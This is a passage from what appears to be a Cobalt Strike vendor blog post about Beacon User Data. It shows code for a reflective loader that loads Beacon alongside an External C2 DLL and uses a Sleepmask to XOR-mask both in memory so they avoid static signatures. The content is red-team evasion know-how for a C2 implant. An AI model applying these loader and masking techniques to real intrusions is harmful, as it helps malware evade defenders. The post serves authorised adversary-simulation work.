<a href="https://www.cobaltstrike.com/blog/cobalt-strike-49-take-me-to-your-loader" target="_blank" rel="noreferrer noopener">CS 4.9</a> to create a mechanism to pass information between a UDRL and Beacon. Initially, it was intended to let users resolve their own syscall information to avoid using Beacon’s default methods of resolution. However, we see this feature becoming an essential part of UDRL development moving forward.</p> <p>In CS 4.10, we updated BUD so that users could track the memory allocated by their UDRLs. This functionality was primarily introduced to:</p> <ul class="wp-block-list"> <li>Ensure the Sleepmask has accurate information about the memory it needs to mask.&nbsp;</li> <li>Support the cleanup of the allocated memory.&nbsp;</li> </ul> <p>To fulfill these requirements, BUD follows <a href="https://learn.microsoft.com/en-us/windows/win32/api/winnt/ns-winnt-memory_basic_information" target="_blank" rel="noreferrer noopener">Microsoft’s abstractions</a> around virtual memory and tracks both the initial allocation to facilitate cleanup and any sections within it to support masking. We refer to these as “<em>regions</em>” and “<em>sections</em>” and use the following <code>ALLOCATED_MEMORY</code>, <code>ALLOCATED_MEMORY_REGION</code> and <code>ALLOCATED_MEMORY_SECTION</code> structures to define them.</p> <div class="wp-block-syntaxhighlighter-code "><pre class="brush: cpp; title: ; notranslate" title=""> typedef struct _ALLOCATED_MEMORY_SECTION { ALLOCATED_MEMORY_LABEL Label; PVOID BaseAddress; SIZE_T VirtualSize; DWORD CurrentProtect; DWORD PreviousProtect; BOOL MaskSection; } ALLOCATED_MEMORY_SECTION, *PALLOCATED_MEMORY_SECTION; typedef struct _ALLOCATED_MEMORY_REGION { ALLOCATED_MEMORY_PURPOSE Purpose; PVOID AllocationBase; SIZE_T RegionSize; DWORD Type; ALLOCATED_MEMORY_SECTION Sections&#x5B;8]; ALLOCATED_MEMORY_CLEANUP_INFORMATION CleanupInformation; } ALLOCATED_MEMORY_REGION, *PALLOCATED_MEMORY_REGION; typedef struct { ALLOCATED_MEMORY_REGION AllocatedMemoryRegions&#x5B;6]; } ALLOCATED_MEMORY, *PALLOCATED_MEMORY; </pre></div> <p class="has-small-font-size"><em><strong>Note:</strong> The <code>ALLOCATED_MEMORY</code> structure encompasses six independent <code>ALLOCATED_MEMORY_REGION</code>s. These can then be broken down into eight individual <code>ALLOCATED_MEMORY_SECTION</code>s.</em></p> <p>To simplify this approach to tracking memory, we have provided some helper functions in the UDRL-VS library. These functions abstract some of the details, but can easily be replaced with custom implementations as required.</p> <ul class="wp-block-list"> <li><code>TrackAllocatedMemoryRegion()</code> &#8211; track an initial allocation of memory.</li> <li><code>TrackAllocatedMemorySection()</code> &#8211; track a section within an existing region.</li> <li><code>TrackAllocatedMemoryBuffer()</code> &#8211; a wrapper around <code>TrackAllocatedMemoryRegion()</code>&nbsp;and <code>TrackAllocatedMemorySection()</code>.</li> </ul> <p>In the following code example, we allocate a &#8220;<em>region</em>&#8221; of memory for the loaded Beacon (via <code>VirtualAlloc()</code>). We then initialize the relevant structures and use <code>TrackAllocatedMemoryRegion()</code> to save the information to BUD.</p> <div class="wp-block-syntaxhighlighter-code "><pre class="brush: cpp; title: ; wrap-lines: false; notranslate" title=""> // Initialize the relevant Beacon User Data structures USER_DATA userData; ALLOCATED_MEMORY allocatedMemory; _memset(&amp;userData, 0, sizeof(USER_DATA)); _memset(&amp;allocatedMemory, 0, sizeof(ALLOCATED_MEMORY)); userData.allocatedMemory = &amp;allocatedMemory; userData.version = COBALT_STRIKE_VERSION; // Allocate region of memory for the loaded Beacon image ULONG_PTR loadedDllBaseAddress = (ULONG_PTR)winApi.VirtualAlloc(NULL, loadedImageSize, MEM_RESERVE | MEM_COMMIT, memoryProtection); &#x5B;...SNIP...] // Save the memory information in the first region entry TrackAllocatedMemoryRegion(&amp;userData.allocatedMemory-&gt;AllocatedMemoryRegions&#x5B;0], PURPOSE_BEACON_MEMORY, (PVOID)loadedDllBaseAddress, loadedImageSize, memoryType, &amp;cleanupMemoryInformation); </pre></div> <p>It is also important to track each PE section independently as this information is required by the Sleepmask. To simplify this process, we have added the following <code>CopyPESectionsAndTrackMemory()</code> function to the UDRL-VS library. It is a slightly modified version of the existing <code>CopyPESections()</code> function, however, it uses <code>TrackAllocatedMemorySection()</code> to automatically save the section information.</p> <div class="wp-block-syntaxhighlighter-code "><pre class="brush: cpp; title: ; wrap-lines: false; notranslate" title=""> BOOL CopyPESectionsAndTrackMemory(PALLOCATED_MEMORY_REGION allocatedMemoryRegion, ULONG_PTR srcImage, PIMAGE_NT_HEADERS ntHeader, ULONG_PTR dstAddress, DWORD memoryProtections, ALLOCATED_MEMORY_MASK_MEMORY_BOOL mask, COPY_PEHEADER copyPeHeader) { PRINT(&quot;&#x5B;+] Copying Sections...\n&quot;); &#x5B;...SNIP...] while (numberOfSections--) { // dstSection is the VA for this section PBYTE dstSection = (PBYTE)dstAddress + sectionHeader-&gt;VirtualAddress; // srcSection is the VA for this sections data PBYTE srcSection = (PBYTE)srcImage + sectionHeader-&gt;PointerToRawData; // Copy the section over DWORD sizeOfData = sectionHeader-&gt;SizeOfRawData; if (!_memcpy(dstSection, srcSection, sizeOfData)) { return FALSE; } // Save the relevant information to the ALLOCATED_MEMORY_SECTION entry TrackAllocatedMemorySection(&amp;allocatedMemoryRegion-&gt;Sections&#x5B;sectionCount], GetSectionLabelFromName(sectionHeader-&gt;Name), dstSection, sectionHeader-&gt;Misc.VirtualSize, memoryProtections, mask); PRINT(&quot;\t&#x5B;+] Copied Section: %s\n&quot;, sectionHeader-&gt;Name); // Get the VA of the next section sectionHeader++; sectionCount++; } return TRUE; } </pre></div> <p>To pass the completed <code>USER_DATA</code> structure to Beacon, we simply add an additional call to <code>DllMain()</code> to our loader with the <code>ul_reason_for_call</code> set to <code>DLL_BEACON_USER_DATA</code>.</p> <div class="wp-block-syntaxhighlighter-code "><pre class="brush: cpp; title: ; notranslate" title=""> ((DLLMAIN)entryPoint)(0, DLL_BEACON_USER_DATA, &amp;userData); </pre></div> <p class="has-small-font-size"><strong><em>Note:</em></strong><em> Beacon copies this information locally so that the BUD structures do not need to remain in memory</em>.</p> <p>And that’s it! Once Beacon is up and running, it will operate in the same fashion as before. However, when it is time to use the Sleepmask, it will have a much more accurate picture of the loaded Beacon image. The Sleepmask will then take the information in BUD and use it to apply runtime masking. </p> <p>This approach allows users to create more generic masking capabilities that can automatically handle different memory layouts. For example, the obfuscation-loader uses a custom PE header which means the original is not present in the loaded image.&nbsp;Previously, this missing PE header would have required changing the Sleepmask code to avoid a crash. However, BUD makes it possible to record this information at load time.</p> <h2 class="wp-block-heading">Case Study: BUD vs External C2</h2> <p>Now that we have covered the basics, we can demonstrate how to use BUD to track an additional memory allocation. In the following sections, we will load an External C2 DLL at the same time as Beacon and mask them both at runtime with Sleepmask-VS.</p> <p>Raphael Mudge <a href="https://www.cobaltstrike.com/blog/kits-profiles-and-scripts-oh-my" target="_blank" rel="noreferrer noopener">originally introduced External C2 in November 2016</a> to allow operators to create custom command and control channels. Whilst this feature was never announced as part of a release, there are several public projects that are <a href="https://www.outflank.nl/blog/2017/09/17/blogpost-cobalt-strike-over-external-c2-beacon-home-in-the-most-obscure-ways/" target="_blank" rel="noreferrer noopener">built on top of External C2</a>, most notably <a href="https://labs.withsecure.com/tools/c3" target="_blank" rel="noreferrer noopener">C3</a>, which provides a complete framework for creating custom C2 channels.</p> <p>At a high-level, External C2 is&nbsp;a specification that allows third-party programs to act as a communication layer for Cobalt Strike&#8217;s Beacon payload. In practice, this means using an SMB Beacon to communicate with a third-party client over a named pipe. The third-party client then communicates with a third-party controller, which interacts with Cobalt Strike’s External C2 server. This specification makes it possible to tunnel Beacon traffic over any service that allows you to read/write data.&nbsp;</p> <p>As part of the original implementation, External C2 required the third-party controller to request a stage from the External C2 server before it could begin sending/receiving data. In addition, this stage was provided by the team server which meant that whilst the&nbsp;transformations in the malleable C2 profile were applied, it was not possible to use Aggressor Script to apply UDRLs/Sleepmasks/custom obfuscation and masking.</p> <p>In CS 4.10, we added a “<em>pass thru</em>” mode to External C2 that allows the third-party controller to begin sending/receiving data immediately without requesting a stage. As a result, it is now possible to export an SMB Beacon from the CS client and use it in combination with a third-party client/controller to connect to the team server. This provides a higher degree of flexibility as it makes it possible to create a single payload file that contains both Beacon and an External C2 channel. In addition, it makes it possible to use Aggressor Script to transform the exported payload.</p> <h3 class="wp-block-heading">Introducing extc2-loader</h3> <p>We have added an extc2-loader example to UDRL-VS. In the extc2-loader folder there are two projects: the first is extc2-dll which ports Raphael’s <a href="https://hstechdocs.helpsystems.com/kbfiles/cobaltstrike/attachments/extc2example.c" target="_blank" rel="noreferrer noopener">original External C2 example</a> to a DLL and the second is the extc2-loader.</p> <p>The extc2-loader is a simple reflective loader that abstracts most of its functionality into a separate function (<code>ExternalC2LoaderLoadDll()</code>) so it can be called multiple times to load each DLL. It is a Double Pulsar/sRDI style reflective loader which means that it is prepended in front of a single payload file. To ensure that the loader can easily identify the two DLLs, the extc2-loader&#8217;s <code>prepend-udrl.cna</code> creates a payload consisting of the loader, the size of Beacon, Beacon and the External C2 DLL.</p> <div class="wp-block-syntaxhighlighter-code "><pre class="brush: perl; title: ; notranslate" title=""> # Pack the raw size of Beacon to simplify the loader $raw_size_of_beacon = pack(&quot;I-&quot;, strlen($beacon)); # Create the payload $payload = $ldr . $raw_size_of_beacon . $beacon . $extc2_dll; </pre></div> <p>This approach makes it possible for the extc2-loader to determine the base address of Beacon and use its length to find the base address of the raw External C2 DLL as well.&nbsp;</p> <div class="wp-block-syntaxhighlighter-code "><pre class="brush: cpp; title: ; wrap-lines: false; notranslate" title=""> // Find the base address of the payload file ULONG_PTR rawBeaconDllBaseAddress = FindBufferBaseAddress(); // Read the size of Beacon rawSizeOfBeacon = *(DWORD*)rawBeaconDllBaseAddress; // Find the start of the Beacon DLL rawBeaconDllBaseAddress += sizeof(DWORD); // Find the start of the External C2 DLL ULONG_PTR rawExtC2DllBaseAddress = rawBeaconDllBaseAddress + rawSizeOfBeacon; </pre></div> <p>Once it has located the base address of each DLL, it can then load them independently via consecutive calls to <code>ExternalC2LoaderLoadDll()</code>.&nbsp;&nbsp;As part of this process, it also tracks the memory and passes the information to Beacon via BUD.</p> <p class="has-small-font-size"><strong><em>Note:</em></strong><em> To easily differentiate between these two regions of memory, we set the purpose field of Beacon’s region to <code>PURPOSE_BEACON_MEMORY</code> and the purpose of the External C2 DLL to an arbitrary value of 2000 to demonstrate using a custom <code>ALLOCATED_MEMORY_PURPOSE</code> value.&nbsp;This makes it possible to easily identify the region of memory in the Sleepmask.</em></p> <p>To launch the capability, we call the External C2 DLL’s entry point to initialize the CRT and ensure that its startup routines have finished. We then resolve its exported <code>go()</code> function and pass it to <code>CreateThread()</code> along with a pointer to BUD’s custom data field. We then call Beacon’s entry point to do the same initialization, pass it a pointer to the <code>USER_DATA</code> structure and start Beacon.</p> <div class="wp-block-syntaxhighlighter-code "><pre class="brush: cpp; title: ; wrap-lines: false; notranslate" title=""> ((DLLMAIN)extC2.EntryPoint)((HINSTANCE)extC2.LoadedBaseAddress, DLL_PROCESS_ATTACH, NULL); constexpr DWORD GO_HASH = CompileTimeHash(&quot;go&quot;); ULONG_PTR extC2Go = ExtC2LoaderFindExportedFunctionByHash(extC2.LoadedBaseAddress, GO_HASH); winApi.CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)extC2Go, &amp;userData.custom, 0, NULL); winApi.Sleep(1000); ((DLLMAIN)beacon.EntryPoint)(0, DLL_BEACON_USER_DATA, &amp;userData); ((DLLMAIN)beacon.EntryPoint)((HINSTANCE)beacon.LoadedBaseAddress, DLL_PROCESS_ATTACH, NULL); ((DLLMAIN)beacon.EntryPoint)((HINSTANCE)loaderStart, 0x4, NULL); </pre></div> <h3 class="wp-block-heading">Runtime Masking</h3> <p>To reliably apply runtime masking, we had to find a way to synchronize the threads to ensure that they &#8220;Sleep&#8221; at the same time. It is safe to mask Beacon when execution reaches the Sleepmask as the thread is no longer executing the Beacon code. However, this is not true for the External C2 DLL which is either waiting for the External C2 server to send data or waiting for Beacon to send it.&nbsp;</p> <p>To overcome this, we modified Raphael’s original External C2 example to use non-blocking calls when reading data from the pipe/socket. This “<em>non-blocking</em>” approach means the External C2 DLL can check if data is available instead of waiting for something to arrive. For example, the following <code>ReadFrameFromBeaconPipe()</code> function uses <code>PeekNamedPipe()</code> to check for data.</p> <div class="wp-block-syntaxhighlighter-code "><pre class="brush: cpp; title: ; wrap-lines: false; notranslate" title=""> int ReadFrameFromBeaconPipe(HANDLE pipeHandle, char* buffer) { DWORD size = 0, temp = 0, total = 0; DWORD totalBytesAvailable = 0; // Check if there&#039;s data on the pipe if (!PeekNamedPipe(pipeHandle, NULL, 0, NULL, &amp;totalBytesAvailable, NULL)) { return EXTC2PIPE_READ_ERROR; } if (totalBytesAvailable == 0) { // If no data is available, return to avoid waiting return NO_DATA_AVAILABLE; } // Read the length of the buffer if (!ReadFile(pipeHandle, (char*)&amp;size, 4, &amp;temp, NULL)) { return EXTC2PIPE_READ_ERROR; } // Read the buffer while (total &lt; size) { if (!ReadFile(pipeHandle, buffer + total, size - total, &amp;temp, NULL)) { return EXTC2PIPE_READ_ERROR; } total += temp; } return size; } </pre></div> <p>The extc2-loader also creates four anonymous event objects. A handle to each event is then saved to BUD’s custom data field and passed to the External C2 DLL’s <code>go()</code> function when the thread is created. This makes it possible to retrieve the same information from within the Sleepmask via <code>BeaconGetCustomUserData()</code>.</p> <div class="wp-block-syntaxhighlighter-code "><pre class="brush: cpp; title: ; wrap-lines: false; notranslate" title=""> ((PEXTC2_SYNC_INFO)userData.custom)-&gt;ExtC2Init = winApi.CreateEventA(NULL, FALSE, FALSE, NULL); if (((PEXTC2_SYNC_INFO)userData.custom)-&gt;ExtC2Init == NULL) { PRINT(&quot;&#x5B;*] Failed to create event. Exiting...\n&quot;); return NULL; } ((PEXTC2_SYNC_INFO)userData.custom)-&gt;ExtC2StopEvent = winApi.CreateEventA(NULL, FALSE, FALSE, NULL); if (((PEXTC2_SYNC_INFO)userData.custom)-&gt;ExtC2StopEvent == NULL) { PRINT(&quot;&#x5B;*] Failed to create event. Exiting...\n&quot;); return NULL; } ((PEXTC2_SYNC_INFO)userData.custom)-&gt;ExtC2SleepEvent = winApi.CreateEventA(NULL, FALSE, FALSE, NULL); if (((PEXTC2_SYNC_INFO)userData.custom)-&gt;ExtC2SleepEvent == NULL) { PRINT(&quot;&#x5B;*] Failed to create event. Exiting...\n&quot;); return NULL; } ((PEXTC2_SYNC_INFO)userData.custom)-&gt;ExtC2ContinueEvent = winApi.CreateEventA(NULL, FALSE, FALSE, NULL); if (((PEXTC2_SYNC_INFO)userData.custom)-&gt;ExtC2ContinueEvent == NULL) { PRINT(&quot;&#x5B;*] Failed to create event. Exiting...\n&quot;); return NULL; } PRINT(&quot;&#x5B;*] Created event objects\n&quot;); </pre></div> <p>&nbsp;The purpose of each of these events has been described below:&nbsp;</p> <ul class="wp-block-list"> <li><code>ExtC2InitEvent</code> – used by Sleepmask-VS to check whether the External C2 DLL is operational.&nbsp;</li> <li><code>ExtC2StopEvent</code> – used by Sleepmask-VS to indicate when the External C2 DLL should wait.&nbsp;</li> <li><code>ExtC2SleepEvent</code> – used by the External C2 DLL to indicate when it is waiting.&nbsp;</li> <li><code>ExtC2ContinueEvent</code> – used by Sleepmask-VS to indicate that the External C2 DLL can continue execution.&nbsp;</li> </ul> <p>These events are then used as part of the External C2 DLL&#8217;s busy loop to:&nbsp;</p> <ul class="wp-block-list"> <li>Check whether Sleepmask-VS has set the <code>ExtC2StopEvent</code>.&nbsp;</li> <li>Signal that the External C2 DLL&#8217;s thread is waiting (<code>ExtC2SleepEvent</code>).&nbsp;</li> <li>Wait for Sleepmask-VS to signal the <code>ExtC2ContinueEvent</code>.&nbsp;</li> </ul> <div class="wp-block-syntaxhighlighter-code "><pre class="brush: cpp; title: ; wrap-lines: false; notranslate" title=""> while (TRUE) { /** * Check whether the Sleepmask has signaled the stop event. * If the stop event is not signaled, continue immediately... */ if (WaitForSingleObject(localExtC2Info.ExtC2StopEvent, 0) == WAIT_OBJECT_0) { /** * Let the Sleepmask know this thread is sleeping and * wait for the Sleepmask to signal the Continue event. * * Note: This allows the Sleepmask to mask the External C2 Dll */ SignalObjectAndWait(localExtC2Info.ExtC2SleepEvent, localExtC2Info.ExtC2ContinueEvent, INFINITE, FALSE); } &#x5B;...SNIP...] } </pre></div> <p>This approach puts Sleepmask-VS in the driving seat. It can mask Beacon and then use the event objects created by the loader to synchronize the threads. In the below example, Sleepmask-VS:&nbsp;</p> <ul class="wp-block-list"> <li>Sets <code>ExtC2StopEvent</code> to instruct the External C2 DLL to wait.</li> <li>Waits for the External C2 DLL to signal that it has entered a waiting state (<code>ExtC2SleepEvent</code>).&nbsp;</li> <li>Masks the External C2 DLL’s PE sections.&nbsp;</li> <li>Sleeps for three seconds.&nbsp;</li> <li>Unmasks the External C2 DLL&#8217;s PE sections.</li> <li>Signals <code>ExtC2ContinueEvent</code> to let the External C2 DLL continue execution.</li> </ul> <div class="wp-block-syntaxhighlighter-code "><pre class="brush: cpp; title: ; wrap-lines: false; notranslate" title=""> void ExternalC2Sleep(PSLEEPMASK_INFO info, PCUSTOM_USER_DATA customUserData) { &#x5B;...SNIP...] // Signal External C2 DLL to wait DLOGF(&quot;SLEEPMASK: ExtC2Sleep - Set Stop event\n&quot;); SetEvent(((PEXTC2_SYNC_INFO)customUserData)-&gt;ExtC2StopEvent); &#x5B;...SNIP...] DLOGF(&quot;SLEEPMASK: ExtC2Sleep - Waiting for External C2 thread to sleep...\n&quot;); DWORD waitStatus = WaitForSingleObject(((PEXTC2_SYNC_INFO)customUserData)-&gt;ExtC2SleepEvent, 30000); if (waitStatus == WAIT_OBJECT_0) { DLOGF(&quot;SLEEPMASK: ExtC2Sleep - External C2 thread sleeping\n&quot;); /* * A small sleep before masking to ensure the External C2 thread * is in the waiting state. */ Sleep(500); // Mask External C2 DLL DLOGF(&quot;SLEEPMASK: ExtC2Sleep - Masking... \n&quot;); XORSections(extC2Memory, info-&gt;beacon_info.mask, TRUE); // Sleep Sleep(3000); // UnMask External C2 DLL DLOGF(&quot;SLEEPMASK: ExtC2Sleep - Unmasking... \n&quot;); XORSections(extC2Memory, info-&gt;beacon_info.mask, FALSE); DLOGF(&quot;SLEEPMASK: ExtC2Sleep - Set Continue event\n&quot;); SetEvent(((PEXTC2_SYNC_INFO)customUserData)-&gt;ExtC2ContinueEvent); } &#x5B;...SNIP...] return; } </pre></div> <p><code>ExternalC2Sleep()</code> is called from within the Sleepmask&#8217;s <code>PivotSleep()</code> function shown below. This makes it possible to keep Beacon masked and continuously mask/unmask the External C2 DLL whilst it waits to receive data.&nbsp;</p> <div class="wp-block-syntaxhighlighter-code "><pre class="brush: cpp; title: ; wrap-lines: false; notranslate" title=""> void PivotSleep(PSLEEPMASK_INFO info, PCUSTOM_USER_DATA customUserData) { &#x5B;...SNIP...] // Check whether the Beacon is an extc2-loader Beacon EXTC2_DLL_STATE externalC2Dll = GetExternalC2DllState(info, customUserData); &#x5B;...SNIP...] else if (action == ACTION_PIPE_PEEK) { DWORD dataAvailable = 0; // Wait for data to be available on our pipe. while (TRUE) { if (!PeekNamedPipe(pivotArguments.pipe, NULL, 0, NULL, &amp;dataAvailable, NULL)) { break; } if (dataAvailable &gt; 0) { break; } if (externalC2Dll == EXTC2_DLL_INITIALIZED) { ExternalC2Sleep(info, customUserData); } /** * A small Sleep between checking the pipe for data * for default pivot Sleep and also gives the External C2 * client time to process any requests after waking up. */ Sleep(500); } } return; } </pre></div> <p>After executing our payload, we can see in ProcessHacker that whilst our memory is <code>RWX</code> (it is an example), it has all been sufficiently masked to avoid simple static signatures.</p> <p class="has-small-font-size"><em><strong>Note:</strong> As part of this example we have not discussed <a href="https://www.cobaltstrike.com/blog/introducing-the-mutator-kit-creating-object-file-monstrosities-with-sleep-mask-and-llvm" target="_blank" rel="noreferrer noopener">masking the Sleepmask itself which is a common target for signatures</a>. However, it would be possible to replace the <code>ExternalC2Sleep()</code> function’s call to <code>Sleep()</code> with <a href="https://github.com/JLospinoso/gargoyle" target="_blank" rel="noreferrer noopener">Gargoyle</a>/ <a href="https://github.com/realoriginal/foliage" target="_blank" rel="noreferrer noopener">Foliage</a>/ <a href="https://github.com/Cracked5pider/Ekko" target="_blank" rel="noreferrer noopener">Ekko</a>/ <a href="https://github.com/thefLink/DeepSleep" target="_blank" rel="noreferrer noopener">Deep Sleep</a> etc as required.</em></p> <figure class="wp-block-image size-large"><img fetchpriority="high" decoding="async" width="1024" height="644" src="https://www.cobaltstrike.com/app/uploads/2024/08/screenshot_process-hacker_beacon-extc2-dll-masked-1-1024x644.png" alt="" class="wp-image-6297" srcset="https://www.cobaltstrike.com/app/uploads/2024/08/screenshot_process-hacker_beacon-extc2-dll-masked-1-1024x644.png 1024w, https://www.cobaltstrike.com/app/uploads/2024/08/screenshot_process-hacker_beacon-extc2-dll-masked-1-300x189.png 300w, https://www.cobaltstrike.com/app/uploads/2024/08/screenshot_process-hacker_beacon-extc2-dll-masked-1-768x483.png 768w, https://www.cobaltstrike.com/app/uploads/2024/08/screenshot_process-hacker_beacon-extc2-dll-masked-1-1536x966.png 1536w, https://www.cobaltstrike.com/app/uploads/2024/08/screenshot_process-hacker_beacon-extc2-dll-masked-1-2048x1288.png 2048w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure> <p class="has-small-font-size"><em><strong>Note:</strong> You may also be wondering why the start of the hex dump of the two DLLs looks the same. This is because we used the same key to mask both DLLs (<code>sleepmaskinfo-&gt;maskKey</code>) and we’re seeing the masked DOS/PE header. The key passed to the Sleepmask is randomly generated which will likely be sufficient. However, it would also be trivial to use different keys.&nbsp;&nbsp;</em></p> <h2 class="wp-block-heading">Conclusion</h2> <p>That brings us to the end of this post, we hope that this has demonstrated the power of the UDRL and the Sleepmask and their central role in Cobalt Strike’s evasion strategy. We also hope it has demonstrated why users should start to think of the UDRL and the Sleepmask together and ways in which they can interoperate to create more advanced capabilities.</p> <p>The code shown here is now available in the UDRL-VS library in the Arsenal Kit. To try it out, simply open the solution and compile the Release build of both the extc2-loader and extc2-dll. You can then load the <code>./bin/extc2-loader/prepend-udrl.cna</code> script into the Cobalt Strike console and export an artefact.</p> </div><!-- .entry-content --> <footer class="entry-footer"> </footer><!-- .entry-footer --> </article><!-- #post-6252 --> </main> </div> <!-- #primary --> <div class="col-lg-4 align-self-start resource-sidebar widget-area"><!-- #resource-sidebar --> <div class="sidebar-content bg-7 mb-3"> <div class=" container"> <div class="row"> <div class="col-12"> <div class="author-description p-3 row"> <div class=" col-12"> <h4 class="author-title text-align-left font-weight-light"> <a href="https://www.cobaltstrike.com/profile/robert-bearsby">Robert Bearsby</a> </h4> <div>Senior Cybersecurity Researcher</div> </div> <div class="col-12 text-center mt-2"> <a class=" btn-link view-profile" href="https://www.cobaltstrike.com/profile/robert-bearsby">View Profile</a> </div> </div> </div> <!-- #column --> </div> <!-- #row --> </div> <!-- #container --> </div> <!-- #sidebar-content --> <div class="sidebar-content bg-7 mb-3"> <div class=" container"> <div class="row"> <div class="col-12"> <div class="sidebar-content p-3"> <div class="block-title text-uppercase"> RELATED PRODUCTS </div> <ul class="list-group list-group-flush pt-2"> <li class="list-unstyled"><a href="" title="Cobalt Strike">Cobalt Strike</a></li> </ul> </div> <div class="sidebar-content p-3"> <div class="block-title text-uppercase"> TOPICS </div> <ul class="list-group list-group-flush pt-2"> <li class="list-unstyled"><a href="https://www.cobaltstrike.com/blog?_sft_cornerstone=development" title="Development">Development</a></li><li class="list-unstyled"><a href="https://www.cobaltstrike.com/blog?_sft_cornerstone=red-team" title="Red Team">Red Team</a></li> </ul> </div> </div> <!-- #column --> </div> <!-- #row --> </div> <!-- #container --> </div> <!-- #sidebar-content --> </div><!-- #resource-sidebar --> </div><!-- .row --> </div><!-- #container --> </div><!-- #page-wrapper --> <footer class="site-footer footer container-fluid"> <div id="footer-center"> <div class="region region-footer"> <div class="container"> <div class="row"> <div class="col-lg-2 text-left text-lg-center"> <a class="logo" href="https://www.fortra.com" title="Home"> <img src="https://static.fortra.com/fortra-global-assets/fortra-logo-full.svg" alt="Fortra" /> </a> </div> <div class="col-lg-7 offset-lg-1 text-center"> <div class="contextual-region block block-block-content"> <div class="content"> <div class="row"> <div class="col-md-7"> <div class="container-fluid"> <ul class="d-flex pl-0 justify-content-center icons"> <li class="px-1 footer-icon"> <a href="tel:+1-800-328-1000"> <span class="icon"> <i class="fal fa-phone-volume" aria-hidden="true"></i> </span> <span class="text comm-links d-block" id="comm-links-telephone">tel:+1-800-328-1000 </span> </a> </li> <li class="px-1 footer-icon"> <a href="/cdn-cgi/l/email-protection#6801060e07280e071a1c1a09460b0705"> <span class="icon"> <i class="fal fa-envelope" aria-hidden="true"></i> </span> <span class="text comm-links d-block" id="comm-links-email">Email Us </span> </a> </li> <li class="px-1 footer-icon"> <a href="https://community.fortra.com/support"> <span class="icon"> <i class="fal fa-headset" aria-hidden="true"></i> </span> <span class="text comm-links d-block" id="comm-links-support">Request Support </span> </a> </li> <li class="px-1 footer-icon"> <a href="https://www.fortra.com/resources/fortra-subscription-center"> <span class="icon"> <i class="fal fa-hand-pointer" aria-hidden="true"></i> </span> <span class="text comm-links d-block" id="comm-links-subscribe">Subscribe </span> </a> </li> </ul> </div> </div> <div class="col-md-5"> <ul class="d-flex pl-0 justify-content-center icons" itemscope="" itemtype="http://schema.org/Organization" > <li class="px-1 footer-icon social"> <a href="https://twitter.com/_CobaltStrike?s=20"> <span class="icon"> <i class="fab fa-x-twitter" aria-hidden="true"></i> </span> <span class="text comm-links d-block" id="comm-links-twitter">X </span> </a> </li> <li class="px-1 footer-icon social"> <a href="https://www.youtube.com/channel/UCXr2bT_K0WpaBrhRlhpFwdw"> <span class="icon"> <i class="fab fa-youtube" aria-hidden="true"></i> </span> <span class="text comm-links d-block" id="comm-links-youtube">Youtube </span> </a> </li> <li class="px-1 footer-icon social"> <a href="https://www.reddit.com/r/Fortra/"> <span class="icon"> <i class="fab fa-reddit" aria-hidden="true"></i> </span> <span class="text comm-links d-block" id="comm-links-youtube">Reddit </span> </a> </li> </ul> </div> </div> </div> </div> </div> </div> <!-- ******************* The Footer Full-width Widget Area ******************* --> <div class="wrapper" id="wrapper-footer-full" role="complementary"> <div class="container" id="footer-full-content" tabindex="-1"> <div class="row"> <div id="nav_menu-2" class="footer-widget widget_nav_menu widget-count-5 col-md-2"><h3 class="d-none widget-title">Footer Menu 1</h3><div class="menu-footer-menu-1-container"><ul id="menu-footer-menu-1" class="menu"><li id="menu-item-4431" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-4431"><a href="/product/features/">Features</a> <ul class="sub-menu"> <li id="menu-item-4432" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-4432"><a href="/product/features/beacon">Beacon</a></li> <li id="menu-item-4433" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-4433"><a href="/product/features/interoperability">Interoperablity</a></li> <li id="menu-item-4434" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-4434"><a href="/product/features/community">Community</a> <ul class="sub-menu"> <li id="menu-item-4435" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-4435"><a href="/product/features/">All Features &gt;</a></li> </ul> </li> </ul> </li> </ul></div></div><!-- .footer-widget --><div id="nav_menu-3" class="footer-widget widget_nav_menu widget-count-5 col-md-2"><h3 class="d-none widget-title">Footer Menu 2</h3><div class="menu-footer-menu-2-container"><ul id="menu-footer-menu-2" class="menu"><li id="menu-item-4436" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-4436"><a href="/product/features/interoperability">Interoperability</a> <ul class="sub-menu"> <li id="menu-item-4437" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-4437"><a href="/product/core-impact">Core Impact</a></li> <li id="menu-item-4438" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-4438"><a href="/product/outflank-security-tooling">Outflank Security Tooling</a></li> </ul> </li> </ul></div></div><!-- .footer-widget --><div id="nav_menu-4" class="footer-widget widget_nav_menu widget-count-5 col-md-2"><h3 class="d-none widget-title">Footer Menu 3</h3><div class="menu-footer-menu-3-container"><ul id="menu-footer-menu-3" class="menu"><li id="menu-item-4439" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-4439"><a href="/support">Support</a> <ul class="sub-menu"> <li id="menu-item-4440" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-4440"><a href="/support/training">Training</a></li> <li id="menu-item-4441" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-4441"><a href="https://cobalt-strike.github.io/community_kit">Community Kit</a></li> </ul> </li> </ul></div></div><!-- .footer-widget --><div id="nav_menu-5" class="footer-widget widget_nav_menu widget-count-5 col-md-2"><h3 class="d-none widget-title">Footer Menu 4</h3><div class="menu-footer-menu-4-container"><ul id="menu-footer-menu-4" class="menu"><li id="menu-item-4442" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-4442"><a href="/resources">Resources</a> <ul class="sub-menu"> <li id="menu-item-4443" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-4443"><a href="/blog">Blog</a></li> <li id="menu-item-4444" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-4444"><a href="/screenshots">Screenshots</a></li> <li id="menu-item-4445" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-4445"><a href="/resources/type-datasheet">Datasheets</a> <ul class="sub-menu"> <li id="menu-item-4446" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-4446"><a href="/resources">All Resources &gt;</a></li> </ul> </li> </ul> </li> </ul></div></div><!-- .footer-widget --><div id="nav_menu-6" class="footer-widget widget_nav_menu widget-count-5 col-md-2"><h3 